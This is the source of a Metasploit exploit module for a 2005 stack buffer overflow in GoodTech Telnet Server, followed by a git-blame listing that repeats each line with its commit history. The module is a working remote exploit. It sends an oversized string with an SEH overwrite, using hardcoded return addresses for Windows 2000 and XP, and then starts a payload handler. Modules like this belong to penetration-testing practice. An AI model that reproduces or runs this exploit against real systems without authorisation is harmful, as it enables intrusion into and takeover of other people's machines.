modules/exploits/windows/telnet/goodtech_telnet.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GoodTech Telnet Server Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in GoodTech Systems Telnet Server
          versions prior to 5.0.7. By sending an overly long string, an attacker can
          overwrite the buffer and control program execution.
        },
        'License' => MSF_LICENSE,
        'Author' => 'MC',
        'References' =>
          [
            [ 'CVE', '2005-0768' ],
            [ 'OSVDB', '14806'],
            [ 'BID', '12815' ],
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
        'Payload' =>
          {
            'Space' => 400,
            'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
            'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"
          },
        'Platform' => 'win',
        'Targets' =>
          [
            [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
            [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
          ],
        'Privileged' => true,
        'DisclosureDate' => '2005-03-15',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RPORT(2380)
      ]
    )
  end

  def exploit
    connect

    sploit = rand_text_english(10020, payload_badchars)
    seh = generate_seh_payload(target.ret)

    sploit[10012, seh.length] = seh

    print_status("Trying target #{target.name}...")

    sock.put(sploit + "\r\n\r\n")

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
added exploit module goodtech_telnet.rb 2006-11-08 23:26:16 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`include Msf::Exploit::Remote::Seh`

added exploit module goodtech_telnet.rb 2006-11-08 23:26:16 +00:00			`def initialize(info = {})`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'GoodTech Telnet Server Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in GoodTech Systems Telnet Server`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`versions prior to 5.0.7. By sending an overly long string, an attacker can`
			`overwrite the buffer and control program execution.`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`},`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`'License' => MSF_LICENSE,`
			`'Author' => 'MC',`
			`'References' =>`
			`[`
			`[ 'CVE', '2005-0768' ],`
			`[ 'OSVDB', '14806'],`
			`[ 'BID', '12815' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
Rubocop recently landed modules 2020-04-16 02:04:17 +01:00			`'EXITFUNC' => 'thread'`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
Rubocop recently landed modules 2020-04-16 02:04:17 +01:00			`'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44"`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],`
			`[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],`
			`],`
			`'Privileged' => true,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2005-03-15',`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`'DefaultTarget' => 0`
			`)`
			`)`
added exploit module goodtech_telnet.rb 2006-11-08 23:26:16 +00:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(2380)`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`]`
			`)`
added exploit module goodtech_telnet.rb 2006-11-08 23:26:16 +00:00			`end`

			`def exploit`
			`connect`

updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`sploit = rand_text_english(10020, payload_badchars)`
Run rubocop -a on subset of files 2020-03-05 14:48:37 +00:00			`seh = generate_seh_payload(target.ret)`
fixed MC spacing 2006-11-09 17:32:56 +00:00
			`sploit[10012, seh.length] = seh`
added exploit module goodtech_telnet.rb 2006-11-08 23:26:16 +00:00
			`print_status("Trying target #{target.name}...")`

			`sock.put(sploit + "\r\n\r\n")`

			`handler`
fixed MC spacing 2006-11-09 17:32:56 +00:00			`disconnect`
added exploit module goodtech_telnet.rb 2006-11-08 23:26:16 +00:00			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`